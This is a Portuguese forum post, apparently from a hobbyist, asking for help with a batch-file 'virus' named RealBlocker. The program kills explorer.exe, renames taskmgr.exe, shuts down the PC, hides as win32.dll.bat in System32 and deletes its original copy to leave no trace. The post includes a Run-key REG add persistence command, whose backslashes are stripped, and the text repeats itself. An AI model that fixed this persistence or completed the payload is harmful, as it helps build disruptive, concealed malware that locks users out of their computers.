Eu to fazendo um script em bat baseado na ideia de um outro que eu vi na net, eu chamo ele de RealBlocker,
Quando o windows começa a carregar o perfil do usuario, o explorer.exe fecha, o arquivo taskmgr.exe (responsavel pelo Ctrl Alt Del) é renomeado pra não ser encontrado, e desliga o computador, tipo o "vírus" shutdown só que mais detalhado, e o ponto dele é que tem como você revertê-lo.
Basta entrar no modo de segurança com prompt de comando. fazendo Login o abrirá o cmd do Windows. Nele, basta digitar cd\ e depois escrever RegCleanBot.bat que ele inicia o reversor que vai apagar o virus.
O problema é aquele esqueminha da pasta inicializar > All Users já tá muito manjado, então fiz o script criar um reg q executa o virus quando o pc liga, MAASS, eu queria deixar o virus na pasta system32, o problema é que o registro não está funcionando.. alguem pode dar uma ajuda??
O nome do arquivo q eu qro executar é win32.dll.bat, ele q fica na system32, o que reverte fica no C: e o original q causou udo é deletado quando o virus é executado a primeira vez pra num deixar rastro..
Taí o código que eu fiz pra add no REG.. Q q eu fiz de errado? Tem que colocar as barras no dir do REG
Quando eu tiver terminado eu posto o script aqui!
Quando o windows começa a carregar o perfil do usuario, o explorer.exe fecha, o arquivo taskmgr.exe (responsavel pelo Ctrl Alt Del) é renomeado pra não ser encontrado, e desliga o computador, tipo o "vírus" shutdown só que mais detalhado, e o ponto dele é que tem como você revertê-lo.
Basta entrar no modo de segurança com prompt de comando. fazendo Login o abrirá o cmd do Windows. Nele, basta digitar cd\ e depois escrever RegCleanBot.bat que ele inicia o reversor que vai apagar o virus.
O problema é aquele esqueminha da pasta inicializar > All Users já tá muito manjado, então fiz o script criar um reg q executa o virus quando o pc liga, MAASS, eu queria deixar o virus na pasta system32, o problema é que o registro não está funcionando.. alguem pode dar uma ajuda??
O nome do arquivo q eu qro executar é win32.dll.bat, ele q fica na system32, o que reverte fica no C: e o original q causou udo é deletado quando o virus é executado a primeira vez pra num deixar rastro..
Taí o código que eu fiz pra add no REG.. Q q eu fiz de errado? Tem que colocar as barras no dir do REG
REG add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v RealBlocker /t REG_SZ /d C:windowsSystem32win32.dll.bat |
Quando eu tiver terminado eu posto o script aqui!